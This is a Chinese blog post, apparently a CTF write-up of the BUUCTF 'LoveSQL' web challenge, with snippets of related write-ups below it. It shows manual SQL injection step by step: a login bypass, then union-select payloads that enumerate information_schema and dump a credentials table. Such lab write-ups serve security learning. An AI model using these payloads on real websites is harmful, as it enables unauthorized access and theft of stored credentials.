当前位置:首页 > CTF > BUU > 正文内容

BUUCTF_web_第八题:[极客大挑战 2019]LoveSQL

七星8个月前 (01-21)BUU576


打开之后, 和之前的类似, 万能密码 1' or 1=1#登录成功,

给了一个admin和一串md5, md5解密失败.

只能常规注入了.

给了个灵魂试探:用 sqlmap 是没有灵魂的

那就手工注入一下,巩固sql语法:

先order by看字段, order by 4的时候,报错了.说明有3个字段.

接着联合查询:

?username=1' union select 1,2,3%23&password=aa

返回

Hello 2!

Your password is '3'

2和3是注入点,通过2注入点再看看数据库:

?username=1' union select 1,database(),3%23&password=aa

返回

Hello geek!

Your password is '3'

得到数据库 geek!


然后爆表名:

?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=aa

得到

Your password is 'geekuser,l0ve1ysq1'

就有两个表:

'geekuser,l0ve1ysq1

盲猜flag在不正常的这个表里


然后爆字段:

?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=aa

返回

Your password is 'id,username,password'

三个字段,然后直接查询就好了

?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=aa

然后直接出flag了.


qixingbit.com|七星比特

相关文章

BUUCTF_web_第13题:[RoarCTF 2019]Easy Calc

BUUCTF_web_第13题:[RoarCTF 2019]Easy Calc

打开题, 发现是个计算器,传入表达式,计算结果,乍一看没啥问题然后祖传的f12, 首先看到的就是一个祖传的注释:<!--I've set up WAF to ensure security.--...

BUUCTF_web_第一题: [HCTF 2018]WarmUp

BUUCTF_web_第一题: [HCTF 2018]WarmUp

第一题: [HCTF 2018]WarmUp f12, 注释里有个文件, 访问, 成功获得审计代码. 审计代码里有个hint.php, 打开, 成功获得ffffllllaaaagggg,...

BUUCTF_web_第五题:[SUCTF 2019]EasySQL

BUUCTF_web_第五题:[SUCTF 2019]EasySQL

[SUCTF 2019]EasySQL打开题目,发现一个搜索框,尝试发现是堆叠注入,先查一下数据库:1;show databases;得到:Array ( [0] => 1 )Array ( [...

BUUCTF_web_第六题:[ACTF2020 新生赛]Include

BUUCTF_web_第六题:[ACTF2020 新生赛]Include

发现是一道include的题, 啥提示也没有,点一下给个tips, 获取到一个?file=flag.php很自然想到了include可以把文件base64再读取文件:/?file=php:/...

BUUCTF_web_第二题:[强网杯 2019]随便注

BUUCTF_web_第二题:[强网杯 2019]随便注

第二题: [强网杯 2019]随便注 测试一下, 1'# 返回正常, 发现是字符注入,尝试show一下database: 1';show databases;%23 发现出结果了:...

BUUCTF_web_第七题:[极客大挑战 2019]Secret File

BUUCTF_web_第七题:[极客大挑战 2019]Secret File

f12, 获得Archive_room.php访问, 嗯, 他说什么什么快没看清, 不要紧, 我们可以让他慢下来开burpsuite, 抓取回显包, 得到secr3t.php访问,成功获得源码high...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。